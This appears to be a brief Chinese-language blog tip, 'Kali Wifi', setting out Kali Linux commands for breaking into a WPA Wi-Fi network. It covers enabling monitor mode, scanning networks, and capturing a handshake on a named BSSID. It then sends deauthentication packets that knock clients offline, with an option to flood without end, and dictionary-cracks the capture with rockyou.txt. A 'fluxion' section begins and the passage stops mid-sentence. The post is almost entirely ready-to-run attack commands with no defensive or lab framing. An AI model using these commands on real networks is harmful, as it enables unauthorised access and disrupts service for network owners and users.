Kali Wifi

 
Category: Tips
  1. 连接无线网卡: ifconfig,
  2. 开启无线网卡: airmon-ng start wlan0,
  3. 监听: airodump-ng wlan0mon,
    • PWR: 信号强度, 数字越低信号越强.
    • CH: WiFi信道.
  4. airodump-ng -c 1 --bssid FA:4C:1F:A0:19:8E -w ~/ wlan0mon,
  5. 发起反认证攻击:aireplay-ng -0 10 -a FA:4C:1F:A0:19:8E wlan0mon
    • -0, 发送包的次数, 参数0为发送无数次.
  6. 字典爆破(适合纯数字): aircrack-ng -a2 -b FA:4C:1F:A0:19:8E -w /home/hep/rockyou.txt ~/*.cap

fluxion

由于这里是